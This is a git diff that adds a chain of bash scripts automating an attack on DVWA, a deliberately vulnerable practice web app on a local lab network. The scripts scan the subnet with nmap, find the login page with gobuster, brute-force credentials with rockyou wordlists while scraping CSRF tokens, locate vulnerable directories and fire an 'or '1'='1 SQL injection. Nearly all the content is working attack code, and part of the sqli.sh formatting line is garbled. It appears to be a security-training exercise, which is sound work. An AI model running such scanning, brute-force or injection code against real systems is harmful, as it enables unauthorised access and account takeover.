diff --git a/bruteForce.sh b/bruteForce.sh
new file mode 100644
index 0000000..ef0f485
--- /dev/null
+++ b/bruteForce.sh
@@ -0,0 +1,71 @@
+#vulnId.sh --> bruteForce.sh
+
+echo -e "\n---- Starting Brute Force on brute vulnerability ----"
+sleep 3s
+
+## Variables
+LOGIN_URL=$LOGIN_URL
+BRUTE_DIR=$BRUTE_DIR
+#USER and PASS found from bruteLogin.sh
+DVWA_USER=$DVWA_USER
+DVWA_PASS=$DVWA_PASS
+
+#DVWA_USER='admin'
+#DVWA_PASS='password'
+
+USER_LIST="/usr/share/seclists/Usernames/top-usernames-shortlist.txt"
+PASS_LIST="/usr/share/seclists/Passwords/Leaked-Databases/rockyou-40.txt"
+
+## Value to look for in response in webpage source code
+SUCCESS="Welcome to the password protected area $DVWA_USER"
+
+## Anti CSRF token
+CSRF="$( curl -sc ~/Documents/DVWA/scripts/dvwa.cookie "$LOGIN_URL" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2 )"
+sed -i '/security/d' ~/Documents/DVWA/scripts/dvwa.cookie
+
+## Login to DVWA using cookie
+curl -sb ~/Documents/DVWA/scripts/dvwa.cookie -d "username=${DVWA_USER}&password=${DVWA_PASS}&user_token=${CSRF}&Login=Login" "$LOGIN_URL" >/dev/null
+[[ "$?" -ne 0 ]] && echo -e '\n[!] Issue connecting! #1' && exit 1
+
+## Counter
+i=0
+
+## Password loop
+while read -r _PASS; do
+
+ ## Username loop
+ while read -r _USER; do
+
+ ## Increase counter
+ ((i=i+1))
+
+ ## Display USER:PASS attempts to user
+ #echo "Try ${i}: ${_USER} : ${_PASS}"
+
+ ## Connect to web server
+ REQUEST="$( curl -sb 'security=low' -b ~/Documents/DVWA/scripts/dvwa.cookie "$BRUTE_DIR/?username=${_USER}&password=${_PASS}&Login=Login" )"
+ [[ $? -ne 0 ]] && echo -e '\n[!] Issue connecting! #2'
+
+ ## Check response against SUCCESS string
+ echo "${REQUEST}" | grep -q "${SUCCESS}"
+ if [[ "$?" -eq 0 ]]; then
+ ## Success!
+ echo -e "\nFound at Try: ${i}"
+ echo "Username: ${_USER}"
+ echo "Password: ${_PASS}"
+
+ #echo "${REQUEST}"
+ echo "$SUCCESS"
+ sleep 3s
+ break 2
+ fi
+
+ done < ${USER_LIST}
+done < ${PASS_LIST}
+
+## Clean up
+#rm -f /tmp/dvwa.cookie
+
+export COUNT=2
+
+/bin/bash ~/Documents/DVWA/scripts/vulnId.sh
diff --git a/bruteLogin.sh b/bruteLogin.sh
new file mode 100644
index 0000000..c5f7619
--- /dev/null
+++ b/bruteLogin.sh
@@ -0,0 +1,60 @@
+#scanInit.sh --> bruteLogin.sh
+
+echo -e " \n---- Starting Brute force on Login Page ---- "
+
+## Variables
+export LOGIN_URL=$LOGIN_URL
+USER_LIST="/usr/share/seclists/Usernames/top-usernames-shortlist.txt"
+PASS_LIST="/usr/share/seclists/Passwords/rockyou.txt"
+export IP=$INIT_IP
+
+## Value to look for in response
+SUCCESS="Location: index.php"
+
+## Counter
+i=0
+
+## Password loop
+while read -r _PASS; do
+
+ ## Username loop
+ while read -r _USER; do
+
+ ## Increase counter
+ ((i=i+1))
+
+ ## Display USER:PASS attempts to user
+ ## Comment out for less noise
+ #echo "Try ${i}: ${_USER} : ${_PASS}"
+
+ ## Connect to web server
+ CSRF=$( curl -sc ~/Documents/DVWA/scripts/dvwa.cookie $LOGIN_URL | awk -F 'value=' '/user_token/ {print $2}' | awk -F "'" '{print $2}' )
+
+ REQUEST="$( curl -sib ~/Documents/DVWA/scripts/dvwa.cookie --data "username=${_USER}&password=${_PASS}&user_token=${CSRF}&Login=Login" $LOGIN_URL )"
+ [[ $? -ne 0 ]] && echo -e '\n[!] Issue connecting! #2'
+
+ ## Check response against SUCCESS string
+ echo "${REQUEST}" | grep -q "${SUCCESS}"
+ if [[ "$?" -eq 0 ]]; then
+ ## Success!
+ echo -e "\nFound at Try ${i}:\nUsername:${_USER}\nPassword:${_PASS}"
+ sleep 3s
+
+ #export credential variables to use in next script
+ export USER="$(echo "${_USER}")"
+ export PASS="$(echo "${_PASS}")"
+
+ break 2
+ fi
+
+ done < ${USER_LIST}
+done < ${PASS_LIST}
+
+## Clean up
+rm -f ~/Documents/DVWA/scripts/dvwa.cookie
+
+#Create counter for next script
+export COUNT=1
+
+#Call next script
+/bin/bash ~/Documents/DVWA/scripts/vulnId.sh
diff --git a/init.sh b/init.sh
new file mode 100644
index 0000000..095d718
--- /dev/null
+++ b/init.sh
@@ -0,0 +1,18 @@
+##init.sh
+
+##Force no internet
+#nmcli networking off
+
+##Check for internet connection
+wget -q --spider http://google.com
+if [ $? -eq 0 ]; then
+ echo "Online"
+ echo -e "---- Starting Network scans ---- \n "
+ /bin/bash ~/Documents/DVWA/scripts/scanInit.sh
+else
+ echo "No network connection"
+ echo "quitting"
+ exit
+fi
+
+
diff --git a/scanInit.sh b/scanInit.sh
new file mode 100644
index 0000000..aaeab1a
--- /dev/null
+++ b/scanInit.sh
@@ -0,0 +1,33 @@
+#init.sh --> scanInit.sh
+
+##Variables
+##export local IP
+#export INIT_IP=$(ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'
+
+#Get all IP's and HTTP ports on network
+nmap -T4 -Pn 192.168.40.141/24 | grep -E 'http|([0-9]{1,3}[\.]){3}[0-9]{1,3}' | grep -v https > tmp.txt
+
+#Get HTTP ip address
+export INIT_IP=$(cat tmp.txt | grep 'http' -B 1 | grep -Eo '([0-9]{1,3}[\.]){3}[0-9]{1,3}')
+#Get HTTP port
+HTTP_PORT=$(cat tmp.txt | grep http | sed 's/[^0-9]*//g')
+
+#rm tmp.txt
+
+#HTTP_PORT=80
+
+echo "IP address: $INIT_IP"
+echo "HTTP port number: $HTTP_PORT"
+export WORD_LIST="/usr/share/dirb/wordlists/common.txt"
+
+#Create variable for the Login URL using the IP and open port number
+export LOGIN_URL=$(gobuster dir -u "$INIT_IP:$HTTP_PORT/DVWA/" -nqelw $WORD_LIST -x php | grep login | grep -o '^\S*')
+
+echo "Full Login URL: $LOGIN_URL"
+
+sleep 3s
+
+#Call next script (Brute Forcing the login page)
+/bin/bash ~/Documents/DVWA/scripts/bruteLogin.sh
+
+
diff --git a/sqli.sh b/sqli.sh
new file mode 100644
index 0000000..816767a
--- /dev/null
+++ b/sqli.sh
@@ -0,0 +1,43 @@
+#vulnId.sh --> sqli.sh
+
+#Variables
+#URL=$URL
+IP=$IP
+SQLI_DIR=$SQLI_DIR'/'
+SQLI_1=' or '1'='1
+EXT='?id=1&Submit=Submit'
+LOGIN_URL="http://192.168.40.145/DVWA/login.php/"
+DVWA_USER=$USER
+DVWA_PASS=$PASS
+
+#sqlmap -u "${SQLI_DIR}?id=&Submit=Submit" --cookie="PHPSESSID=96uqh3mj23mg50vnn2uadsj5rj;security=low" --batch --drop-set-cookie
+
+## Anti CSRF token
+CSRF="$( curl -sc ~/Documents/DVWA/scripts/dvwa.cookie "$LOGIN_URL" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2 )"
+sed -i '/security/d' ~/Documents/DVWA/scripts/dvwa.cookie
+
+## Login to DVWA using cookie
+curl -sb ~/Documents/DVWA/scripts/dvwa.cookie -d "username=${DVWA_USER}&password=${DVWA_PASS}&user_token=${CSRF}&Login=Login" "$LOGIN_URL" >/dev/null
+[[ "$?" -ne 0 ]] && echo -e '\n[!] Issue connecting! #1' && exit 1
+
+## Connect to server using cookie
+ REQUEST="$( curl -sb 'security=low' -b ~/Documents/DVWA/scripts/dvwa.cookie "${SQLI_DIR}?username=${DVWA_USER}&password=${DVWA_PASS}&Login=login${EXT}" )"
+ [[ $? -ne 0 ]] && echo -e '\n[!] Issue connecting! #2'
+
+#Display Success
+echo "${REQUEST}" | grep "Vulnerability: SQL Injection" | sed -e 's/^[ \t]*//'
+
+#Attempt SQLi with DVWA'or'1'='1
+echo -e "\n---- Attempting SQLi using DVWA'or'1'='1 ----\n"
+TEST1="$( curl -sb 'security=low' -b ~/Documents/DVWA/scripts/dvwa.cookie "${SQLI_DIR}?id=DVWA'or'1'='1&Submit=Submit" )"
+ [[ $? -ne 0 ]] && echo -e '\n[!] Issue connecting! #2'
+
+#Format output
+echo "${TEST1}" | grep -o -P '(?<=pre).*(?=pre)' | sed -e 's/
/\\\n/g' -e 's/\\/ /g' -e 's/[/>]//g' -e 's//g' + +export COUNT=3 + +/bin/bash ~/Documents/DVWA/scripts/vulnId.sh + +#Clean up +#rm -r /root/.sqlmap/output/$IP diff --git a/vulnId.sh b/vulnId.sh new file mode 100644 index 0000000..2b3babf --- /dev/null +++ b/vulnId.sh @@ -0,0 +1,37 @@ +#bruteLogin.sh --> vulnId.sh +#bruteForce.sh --> vulnId.sh + +##Variables +#export URL="http://192.168.40.145/DVWA/vulnerabilities" +WORD_LIST="/usr/share/dirb/wordlists/common.txt" +EXT="/DVWA/vulnerabilities" +COUNT=$COUNT +#export COUNT=$COUNT +export DVWA_USER=$USER +export DVWA_PASS=$PASS +export LOGIN_URL=$LOGIN_URL +export IP=$IP + +case $COUNT in + 1) + #dirb on DVWA home page to find brute vulnerability directory + echo -e "\n---- Finding brute force directory ----\n" + export BRUTE_DIR="http://"$IP$EXT$(gobuster dir -u 'http://'$IP$EXT -w $WORD_LIST | grep '/brute ' | grep -o '^\S*') + echo -e "Directory with brute vulnerability: $BRUTE_DIR" + sleep 5s + /bin/bash ~/Documents/DVWA/scripts/bruteForce.sh + ;; + 2) + #find sqli vulnerability directory + echo -e "\n---- Finding SQL injection directory ----\n" + export SQLI_DIR="http://"$IP$EXT$(gobuster dir -u 'http://'$IP$EXT -w $WORD_LIST | grep '/sqli ' | grep -o '^\S*') + echo -e "Directory with sqli vulnerability: $SQLI_DIR \n" + sleep 5s + /bin/bash ~/Documents/DVWA/scripts/sqli.sh + ;; + 3) + rm tmp.txt + rm dvwa.cookie + ;; + *) +esac